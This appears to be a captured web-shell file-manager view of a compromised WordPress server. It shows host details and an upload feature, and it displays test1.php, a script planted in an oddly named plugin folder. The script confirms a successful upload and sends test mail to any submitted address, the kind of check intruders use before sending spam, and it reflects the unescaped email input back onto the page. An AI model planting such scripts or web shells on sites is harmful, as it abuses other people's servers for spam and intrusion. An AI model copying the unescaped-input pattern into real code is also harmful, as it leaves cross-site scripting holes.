HEX
Server: Apache/2.4.57 (Debian)
System: Linux 8ea768a960b0 5.15.0-105-generic #115-Ubuntu SMP Mon Apr 15 09:52:04 UTC 2024 x86_64
User: www-data (33)
PHP: 8.2.18
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/qeunpyo/test1.php
<?php
error_reporting(0);

?>
Upload is <b><color>WORKING</color></b><br>
Check  Mailling ..<br>
<form method="post">
<input type="text" name="email" value="<?php
print $_POST['email']?>"required >
<input type="submit" value="Send test >>">
<br>

</form>
<br>
<?php
if (!empty($_POST['email'])){
	$xx = rand();
	@mail($_POST['email'],"Result Report Test -
".$xx,"WORKING !");
	print "<b>send an report to
[".$_POST['email']."] - $xx</b>"; 
}
?>